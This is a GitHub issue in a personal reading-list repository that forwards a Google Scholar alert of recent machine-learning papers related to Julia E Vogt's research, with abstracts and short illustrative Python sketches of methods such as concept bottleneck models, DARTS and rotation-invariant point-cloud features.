amir9979 / reading_list

my simple reading list
Julia E Vogt - new related research #7089

Open fire-bot opened 1 month ago

fire-bot commented 1 month ago

Sent by Google Scholar Alerts (scholaralerts-noreply@google.com). Created by fire.


[PDF] EQ-CBM: A Probabilistic Concept Bottleneck with Energy-based Models and Quantized Vectors

S Kim, D Ahn, BC Ko, I Jang, KJ Kim - arXiv preprint arXiv:2409.14630, 2024

The demand for reliable AI systems has intensified the need for interpretable deep
neural networks. Concept bottleneck models (CBMs) have gained attention as an
effective approach by leveraging human-understandable concepts to enhance …
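The two-stage structure the abstract describes is easy to sketch: the network first predicts a small set of human-readable concepts, and the final label is computed only from those concepts. A minimal numpy illustration (the sizes, random weights, and sigmoid concept heads are hypothetical, not taken from EQ-CBM):

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical sizes: 16-dim input, 4 interpretable concepts, 3 classes.
W_concept = rng.normal(size=(16, 4))   # input -> concept logits
W_label = rng.normal(size=(4, 3))      # concepts -> class logits

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def cbm_forward(x):
    # Stage 1: predict human-understandable concepts (the "bottleneck").
    concepts = sigmoid(x @ W_concept)
    # Stage 2: the label is computed ONLY from the predicted concepts,
    # so each decision can be explained in concept terms.
    logits = concepts @ W_label
    return concepts, logits

concepts, logits = cbm_forward(rng.normal(size=(16,)))
```

EQ-CBM itself adds energy-based models and quantized vectors on top of this structure; the sketch shows only the basic bottleneck.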

[PDF] Interpreting Deep Neural Network-Based Receiver Under Varying Signal-To-Noise Ratios

M Tuononen, D Korpi, V Hautamäki - arXiv preprint arXiv:2409.16768, 2024

We propose a novel method for interpreting neural networks, focusing on a
convolutional neural network-based receiver model. The method identifies which unit
or units of the model contain the most (or least) information about the channel parameter …
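One simple way to picture "which units contain information about a channel parameter" is to score each unit's activations against the parameter across many inputs. The sketch below uses absolute Pearson correlation as the scoring proxy on toy activations; both the data and the choice of correlation are assumptions for illustration, not the paper's estimator:

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy setup: a "channel parameter" (e.g. SNR) and two hidden units.
# Unit 0 tracks the parameter closely; unit 1 is pure noise. These
# activations stand in for a receiver network's hidden layer.
snr = rng.uniform(0, 30, size=200)
acts = np.stack([snr + rng.normal(scale=1.0, size=200),
                 rng.normal(size=200)], axis=1)

def unit_informativeness(acts, param):
    # Proxy for "information about the parameter": absolute Pearson
    # correlation between each unit's activation and the parameter.
    return np.array([abs(np.corrcoef(acts[:, i], param)[0, 1])
                     for i in range(acts.shape[1])])

scores = unit_informativeness(acts, snr)
# scores.argmax() identifies the most informative unit (unit 0 here).
```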

[PDF] RI-MAE: Rotation-Invariant Masked AutoEncoders for Self-Supervised Point Cloud Representation Learning

K Su, Q Wu, P Cai, X Zhu, X Lu, Z Wang, K Hu - arXiv preprint arXiv:2409.00353, 2024

Masked point modeling methods have recently achieved great success in self-
supervised learning for point cloud data. However, these methods are sensitive to
rotations and often exhibit sharp performance drops when encountering rotational …
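The rotation sensitivity mentioned here comes from learning on raw coordinates, which change under rotation. A rotation-invariant representation is one that does not: pairwise distances between points, for example, survive any rotation. A small numpy check of that property (this illustrates invariance in general, not RI-MAE's architecture):

```python
import numpy as np

rng = np.random.default_rng(0)
points = rng.normal(size=(8, 3))  # a tiny point cloud

# A rotation about the z-axis by 30 degrees.
theta = np.pi / 6
R = np.array([[np.cos(theta), -np.sin(theta), 0],
              [np.sin(theta),  np.cos(theta), 0],
              [0,              0,             1]])

def pairwise_dists(p):
    diff = p[:, None, :] - p[None, :, :]
    return np.linalg.norm(diff, axis=-1)

rotated = points @ R.T
# Raw coordinates change under rotation ...
assert not np.allclose(points, rotated)
# ... but pairwise distances (a rotation-invariant feature) do not.
assert np.allclose(pairwise_dists(points), pairwise_dists(rotated))
```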

[PDF] The role of data embedding in quantum autoencoders for improved anomaly detection

JY Araz, M Spannowsky - arXiv preprint arXiv:2409.04519, 2024

The performance of Quantum Autoencoders (QAEs) in anomaly detection tasks is
critically dependent on the choice of data embedding and ansatz design. This study
explores the effects of three data embedding techniques, data re-uploading, parallel …

[PDF] Learning Interpretable Reward Models via Unsupervised Feature Selection

D Baimukashev, G Alcan, V Kyrki, KS Luck - 8th Annual Conference on Robot Learning

In complex real-world tasks such as robotic manipulation and autonomous driving,
collecting expert demonstrations is often more straightforward than specifying
precise learning objectives and task descriptions. Learning from expert data can be …

[PDF] Supplementary material of: ViC-MAE: Self-Supervised Representation Learning from Images and Video with Contrastive Masked Autoencoders

J Hernandez, R Villegas, V Ordonez

# V: [N, T, C, H, W] minibatch (T = 1 for images)
# tau: temperature coefficient
# lambda: contrastive coefficient
for V in loader:
    # Distant sampling
    f_i, f_j = random_sampling(V)
    # Patch embeddings and position encodings
    x_i …

Semantic-DARTS: Elevating Semantic Learning for Mobile Differentiable Architecture Search

B Guo, S He, M Shi, K Yu, J Chen, X Shen - IEEE Internet of Things Journal, 2024

Differentiable ARchitecture Search (DARTS) is a prevailing direction in automatic
machine learning, but it may suffer from performance collapse and generalization
issues. Recent efforts mitigate them by integrating regularization into architectural …
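DARTS makes the discrete choice of operation differentiable by relaxing each edge of the architecture into a softmax-weighted mixture of candidate operations. A toy sketch of that continuous relaxation (the scalar ops and alpha values are illustrative; real DARTS mixes convolutions, pooling, and skip connections inside a network):

```python
import numpy as np

# Candidate operations on one edge (toy scalar ops for illustration).
ops = [lambda x: x,                  # identity / skip-connection
       lambda x: np.zeros_like(x),   # "zero" (no connection)
       lambda x: np.maximum(x, 0)]   # ReLU-like op

# Learnable architecture parameters, one per candidate op.
alpha = np.array([1.0, 0.2, -0.5])

def mixed_op(x, alpha):
    # Continuous relaxation: a softmax over alpha weights every candidate,
    # making the architecture choice differentiable end to end.
    w = np.exp(alpha - alpha.max())
    w /= w.sum()
    return sum(wi * op(x) for wi, op in zip(w, ops))

y = mixed_op(np.array([-1.0, 2.0]), alpha)
# After search, the edge is discretized to argmax(alpha) (here: identity).
```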

[PDF] Interpretable by Design: Wrapper Boxes Combine Neural Performance with Faithful Attribution of Model Decisions to Training Data

Y Su, JJ Li, M Lease - The 7th BlackboxNLP Workshop-ARR Submissions

Can we preserve the accuracy of neural models while also providing faithful
explanations of model decisions with respect to training data? We propose “wrapper
boxes”: training a neural model as usual and then using its learned feature …
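The wrapper-box recipe, as described, keeps the neural model's learned features but swaps its output head for a classifier whose decisions point back to specific training examples. A minimal sketch using k-nearest neighbors in a hypothetical feature space (the random "feature extractor" stands in for a trained network's penultimate layer; the paper may use other interpretable classifiers):

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical learned feature extractor (a trained network's
# penultimate layer would play this role).
W = rng.normal(size=(10, 4))
def features(x):
    return np.maximum(x @ W, 0)

X_train = rng.normal(size=(20, 10))
y_train = rng.integers(0, 2, size=20)

def knn_predict(x, k=3):
    # "Wrapper box" idea: classify in the learned feature space with k-NN,
    # so every prediction is faithfully attributed to training examples.
    d = np.linalg.norm(features(X_train) - features(x), axis=1)
    nearest = np.argsort(d)[:k]
    votes = y_train[nearest]
    return int(np.bincount(votes).argmax()), nearest  # label + attribution

label, support = knn_predict(X_train[0])
```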

[PDF] GRACE: Graph-Based Contextual Debiasing for Fair Visual Question Answering (Supplementary Materials)

Y Zhang, M Jiang, Q Zhao

In our main paper, we have presented GRACE, a novel approach addressing biases
in knowledge-based VQA. It surpasses current debiasing methods, which primarily
tackle dataset biases but fall short in handling biases within the in-context learning …

[PDF] DEVIAS: Learning Disentangled Video Representations of Action and Scene

K Bae, G Ahn, Y Kim, J Choi

Video recognition models often learn scene-biased action representation due to the
spurious correlation between actions and scenes in the training data. Such models
show poor performance when the test data consists of videos with unseen action …

This message was sent by Google Scholar because you're following new articles related to research by Julia E Vogt.

